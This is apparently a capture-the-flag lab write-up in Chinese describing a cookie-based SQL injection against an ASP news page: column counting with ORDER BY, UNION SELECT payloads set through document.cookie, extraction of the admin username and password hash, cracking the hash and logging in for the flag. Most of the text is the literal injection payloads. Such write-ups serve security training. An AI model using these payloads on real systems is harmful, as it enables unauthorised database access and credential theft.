1、进入靶场使用order by 10查询字段返回正常,使用order by 11 返回错误页面,得知数据库字段为10.
2、使用union select 1,2,3,4,5,6,7,8,9,10 from admin 猜解表名是否为admin。显示错误,语句被过滤。
3、使用cookie注入语句javascript:alert(document.cookie="id="+escape("171")),打开页面http://120.203.13.111:8001/shownews.asp?显示正常,说明id=171以cookie形式传入数据库。
4、使用语句javascript:alert(document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin"))猜解表名是否为admin进行弹窗,打开原来http://120.203.13.111:8001/shownews.asp?网址页面回显2,3,7,8,9字段。
5、使用javascript:alert(document.cookie="id="+escape("171 union select 1,username,password,4,5,6,7,8,9,10 from admin"))对用户名和密码进行查询进行弹窗,打开原来网址http://120.203.13.111:8001/shownews.asp?回显username为adminpassword为b9a2a2b5dffb918c经cmd5解密获得密码welcom。
6、登陆后台获得flagzkz{welcome-control}
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.